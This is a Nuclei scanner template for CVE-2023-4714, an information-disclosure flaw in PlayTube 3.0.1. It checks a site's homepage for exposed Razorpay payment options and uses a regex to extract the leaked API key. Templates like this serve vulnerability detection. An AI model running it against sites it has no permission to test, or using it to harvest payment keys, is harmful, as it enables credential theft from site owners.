id: CVE-2023-4714

info:
  name: PlayTube 3.0.1 - Information Disclosure
  author: Farish
  severity: high
  description: |
    A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-4714
    - https://www.exploitalert.com/view-details.html?id=39826
    - https://vuldb.com/?ctiid.238577
    - https://vuldb.com/?id.238577
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-4714
    cwe-id: CWE-200
    epss-score: 0.02146
    epss-percentile: 0.88073
    cpe: cpe:2.3:a:playtube:playtube:3.0.1:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: playtube
    product: playtube
  tags: cve,cve2023,playtube,exposure

http:
  - method: GET
    path:
      - '{{BaseURL}}'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "razorpay_options"
          - "PlayTube"
          - "key:"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        regex:
          - 'key: "([a-z_A-Z0-9]+)"'
# digest: 4b0a00483046022100d902782f597dfc41d7f7178cff336b3300f114ccae0fca4d8aaabadd1630fe2a022100a17a4ce7f34f98b37a474e98b8d8602ebe71797afa07032a245018c8899c1132:922c64590222798bb761d5b6d8e72950